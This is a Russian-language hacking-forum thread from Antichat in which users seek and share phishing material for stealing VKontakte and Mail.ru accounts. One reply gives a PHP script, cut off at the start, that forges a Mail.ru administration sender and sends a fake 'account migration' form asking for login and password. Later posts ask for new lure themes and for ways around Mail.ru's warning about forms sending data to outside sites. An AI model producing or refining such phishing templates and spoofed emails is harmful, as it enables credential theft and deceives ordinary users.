ANTICHAT - Фейк ВКонтакте

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Фейк ВКонтакте (https://forum.antichat.xyz/showthread.php?t=8061104)

Остались ли какие-нибудь фейки в теле письма для ВКонтакте, с переходом на фейк страницу, то есть, без окошка авторизации.

Люди, подскажите тематику письма для взлома.

Не буду взламывать сервер, не буду использовать sql-инъекции, не буду воровать cookies. Потому что большинство этих способов уже не работает – дыры в почтовых сервисах залатывают. Большинство статей по взлому почты безнадежно устарели. Буду использовать социальную инженерию.

Социальная инженерия - это метод несанкционированного доступа к информации или системам хранения информации без использования технических средств. Метод основан на использовании слабостей человеческого фактора и считается очень разрушительным. Злоумышленник получает информацию, например, путем сбора информации о служащих объекта атаки, с помощью обычного телефонного звонка или путем проникновения в организацию под видом ее служащего. Злоумышленник может позвонить работнику компании (под видом технической службы) и выведать пароль, сославшись на необходимость решения небольшой проблемы в компьютерной системе. Очень часто этот трюк проходит.

Пользователю приходит письмо от администрации mail.ru, в котором написано что мы переходим на новое оборудование и ваш ящик переносится на другой сервер. Поэтому вы должны подтвердить ваши данные. Чуть ниже размещена форма для ввода данных (имя, текущий пароль и т.д.). Далее пользователь заполняет форму, нажимает кнопку отправить и данные уходят на другой сервер, где сохраняются, а потом его перекидывает обратно на mail.ru. Все это проходит незаметно для пользователя. Единственная проблема чтобы пользователь поверил в правдивость письма. Для этого подделывается ящик отправителя administration@mail.ru и все фразы в тексте должны быть стандартными (вроде “благодарим Вас за понимание…”).

Подделываем письмо.

\r\n";
$header.="Subject: $subject \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";
$msg="

Уважаемый пользователь name@mail.ru!

От лица нашего интернет-холдинга Mail.ru мы просим извинения за причинение
вам некоторых неудобств.
В связи со сменой нашего оборудования на более новое нам нужно
перенести часть аккаунтов на новое оборудование.
Соответственно просим повторно прислать некоторую информацию о своем аккаунте.
Это нужно для предотвращения всякого рода ошибок и неточностей.

В противном случае Вы можете лишиться своего
почтового ящика!

Заполните нижеприведенную форму:

Логин: @mail.ru
Пароль:
Подтвердите пароль:
Имя:
Фамилия:

Спасибо за то, что Вы являетесь пользователем Mail.Ru.

С уважением, администрация Mail.ru

";
mail('name@mail.ru', $subject, $msg, $header);
?>

Кстати, этим способом можно отправлять письмо от имени любого человека. В таком виде письмо придет пользователю.

Цитата:

Сообщение от Love2013Love

Кстати, этим способом можно отправлять письмо от имени любого человека. В таком виде письмо придет пользователю.

С этим всем я уже давно знаком.
У тебя писем для ВКонтакте нету?

Конкретно что надо?

Цитата:

Сообщение от stivens20

Конкретно что надо?

Фейк в теле письма для ВКонтакте, с переходом на фейк сайт. То есть, окно авторизации пользователя не нужно.
Хочу новый фейк сделать, а вот насчет тематики письма сложновато.

Цитата:

Сообщение от Kiebling

Фейк в теле письма для ВКонтакте, с переходом на фейк сайт. То есть, окно авторизации пользователя не нужно.
Хочу новый фейк сделать, а вот насчет тематики письма сложновато.

Сильно постараться нужно чтоб схож был или палят!Не очень удачная идея.В полне достачно что письмо дошло и логи пришли.

Ну а как сейчас обойти защиту Mail.ru? При вводе данных и при нажатие на кнопкочки "Войти", "Авторизоваться", "Подтвердить", всплывает окошко Mail.ru, с подтверждением отправки данных на сторонний ресурс. :(